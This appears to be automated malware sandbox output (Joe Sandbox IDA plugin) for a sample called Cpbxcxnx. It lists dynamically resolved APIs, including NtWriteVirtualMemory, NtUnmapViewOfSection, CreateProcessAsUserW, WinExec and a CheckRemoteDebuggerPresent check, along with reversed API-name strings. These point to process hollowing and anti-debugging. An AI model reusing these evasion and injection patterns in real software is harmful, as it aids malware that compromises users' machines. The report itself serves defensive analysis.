                                                                  • Instruction ID: 03b81a385b6d70c4979dfd1c66779bbf4e114f2d1b5caf7beffa2acb8a9726f8
                                                                  • Opcode Fuzzy Hash: 9dab1236a26cbebcaa6dc9851b1c5418d144d65b2d30c38d82b57ea516be24ca
                                                                  • Instruction Fuzzy Hash: 1C115774644208BFEB15EFA4DC51E9EB7ADEB4C710F618868F904D7A41DA30EA14DF60

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 02CC8020: GetModuleHandleA.KERNELBASE(?), ref: 02CC8072
                                                                    • Part of subcall function 02CC80C8: GetProcAddress.KERNEL32(?,?), ref: 02CC812D
                                                                  • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CC82C5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2404968274.0000000002CB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CB1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_2cb1000_Cpbxcxnx.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleMemoryModuleProcReadVirtual
                                                                  • String ID: ntdll$yromeMlautriVdaeRtN
                                                                  • API String ID: 2004920654-737317276
                                                                  • Opcode ID: 79476487d0805dc815d34b51da958647eef66ce9678d8188f5eb561e32ee9c55
                                                                  • Instruction ID: a06762e3e028f57b7a1db7c1fad71c169c294ddd88e475cb8972357d007e8494
                                                                  • Opcode Fuzzy Hash: 79476487d0805dc815d34b51da958647eef66ce9678d8188f5eb561e32ee9c55
                                                                  • Instruction Fuzzy Hash: F1015774604208BFEB12EFA8D851E9F77EEEB48710F614964F504D7A00D630ED109B24

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 02CC8020: GetModuleHandleA.KERNELBASE(?), ref: 02CC8072
                                                                    • Part of subcall function 02CC80C8: GetProcAddress.KERNEL32(?,?), ref: 02CC812D
                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CC7D74
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2404968274.0000000002CB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CB1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_2cb1000_Cpbxcxnx.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleMemoryModuleProcVirtualWrite
                                                                  • String ID: Ntdll$yromeMlautriVetirW
                                                                  • API String ID: 4260932595-3542721025
                                                                  • Opcode ID: db4896ec7ccd1f9a051f23a6d7b99b4df59a90d52efa271370e653eae26467f2
                                                                  • Instruction ID: ba7443da7b11087ac161fdb47855a667d89692593ecf2b618aca7906249e8e9a
                                                                  • Opcode Fuzzy Hash: db4896ec7ccd1f9a051f23a6d7b99b4df59a90d52efa271370e653eae26467f2
                                                                  • Instruction Fuzzy Hash: 65012974604208BFEB11EFA8E851EAEB7EDEB48710F614464F508D7B40D630ED149F64

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 02CC8020: GetModuleHandleA.KERNELBASE(?), ref: 02CC8072
                                                                    • Part of subcall function 02CC80C8: GetProcAddress.KERNEL32(?,?), ref: 02CC812D
                                                                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 02CC8529
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2404968274.0000000002CB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CB1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_2cb1000_Cpbxcxnx.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProcSectionUnmapView
                                                                  • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                  • API String ID: 2801472262-2520021413
                                                                  • Opcode ID: 7a18eb269d577a28806afb431ed17ccde9f39ebf3521feea59cacb76b349678e
                                                                  • Instruction ID: 1b492233f79a6e3e2c6e913ba22ccdf6df45ffb5d2573b427bceab747dd7fa26
                                                                  • Opcode Fuzzy Hash: 7a18eb269d577a28806afb431ed17ccde9f39ebf3521feea59cacb76b349678e
                                                                  • Instruction Fuzzy Hash: B3018F78A44204BFEB16EBA4D851A9EB7AEEF49710F614964F50497B00CA70ED11DE20

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 02CC8020: GetModuleHandleA.KERNELBASE(?), ref: 02CC8072
                                                                    • Part of subcall function 02CC80C8: GetProcAddress.KERNEL32(?,?), ref: 02CC812D
                                                                  • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CC8668
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2404968274.0000000002CB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CB1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_2cb1000_Cpbxcxnx.jbxd
                                                                  Similarity
                                                                  • API ID: AddressCreateHandleModuleProcProcessUser
                                                                  • String ID: CreateProcessAsUserW$Kernel32
                                                                  • API String ID: 4105707577-2353454454
                                                                  • Opcode ID: 51872e42b8a189cd5ae8546693ae9caa457967cb6de7bde15850b6b0fcf4a10b
                                                                  • Instruction ID: 1c12812a3a473b168edf43b0ae23602045eecd521be6ad90e4fe4aa398a5af0c
                                                                  • Opcode Fuzzy Hash: 51872e42b8a189cd5ae8546693ae9caa457967cb6de7bde15850b6b0fcf4a10b
                                                                  • Instruction Fuzzy Hash: DD11D3B5604208BFDB52EEA8DD51F9B37EDEB0C710F614624FA08D7A40C634ED109B64

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 02CC8020: GetModuleHandleA.KERNELBASE(?), ref: 02CC8072
                                                                    • Part of subcall function 02CC80C8: GetProcAddress.KERNEL32(?,?), ref: 02CC812D
                                                                  • WinExec.KERNEL32(?,?), ref: 02CC8478
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2404968274.0000000002CB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CB1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_2cb1000_Cpbxcxnx.jbxd
                                                                  Similarity
                                                                  • API ID: AddressExecHandleModuleProc
                                                                  • String ID: Kernel32$WinExec
                                                                  • API String ID: 3450258509-3609268280
                                                                  • Opcode ID: 46d3a64edaeeb2c980326e9cc7a99a7659d12be13daa0a2f5d4953144a3c7b11
                                                                  • Instruction ID: b8ca0f22ead6d31d3e9841f98699960d244ebd96e12d747521e7fb74a4cb50e4
                                                                  • Opcode Fuzzy Hash: 46d3a64edaeeb2c980326e9cc7a99a7659d12be13daa0a2f5d4953144a3c7b11
                                                                  • Instruction Fuzzy Hash: 1A018174A44204BFEB22EFA4DC21B9B77EDEB48B10F618525F604D3B41D674ED109B24

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 02CC8020: GetModuleHandleA.KERNELBASE(?), ref: 02CC8072
                                                                    • Part of subcall function 02CC80C8: GetProcAddress.KERNEL32(?,?), ref: 02CC812D
                                                                  • WinExec.KERNEL32(?,?), ref: 02CC8478
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2404968274.0000000002CB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CB1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_2cb1000_Cpbxcxnx.jbxd
                                                                  Similarity
                                                                  • API ID: AddressExecHandleModuleProc
                                                                  • String ID: Kernel32$WinExec
                                                                  • API String ID: 3450258509-3609268280
                                                                  • Opcode ID: a2b61690349af959b7b6151d96c12562f5782a443885d1291cc08308de6ccede
                                                                  • Instruction ID: 759aadccba94a38b31759f240ceed83e7a7596887ed005b78d71345144fd40b2
                                                                  • Opcode Fuzzy Hash: a2b61690349af959b7b6151d96c12562f5782a443885d1291cc08308de6ccede
                                                                  • Instruction Fuzzy Hash: 72F08174A44204BFEB22EFA4DC21B9B77EDEB48B10F618525F604D3B41D674AD109B24

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 8664 2ccebf0-2ccec0a call 2cb6638 8667 2ccec0c-2ccec1e call 2cb6640 8664->8667 8668 2ccec36-2ccec3e 8664->8668 8667->8668 8671 2ccec20-2ccec30 CheckRemoteDebuggerPresent 8667->8671 8671->8668 8672 2ccec32 8671->8672 8672->8668
                                                                  APIs
                                                                  • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02CCEC29
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2404968274.0000000002CB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CB1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_2cb1000_Cpbxcxnx.jbxd
                                                                  Similarity
                                                                  • API ID: CheckDebuggerPresentRemote
                                                                  • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                  • API String ID: 3662101638-539270669
                                                                  • Opcode ID: 6fc6d826dd92796cee62fdd7f4ea2705c77f91b2764eef30d25f1e4220a75fc4
                                                                  • Instruction ID: a8c31f514015f1c2c748f5caf2ca87c3aa0711984297418914bd3b96ce80dba9
                                                                  • Opcode Fuzzy Hash: 6fc6d826dd92796cee62fdd7f4ea2705c77f91b2764eef30d25f1e4220a75fc4
                                                                  • Instruction Fuzzy Hash: 7CF0A07090464CAAEB22A7B8C8897EDFBAD6B06338F7403A8E424621C1E7750784C651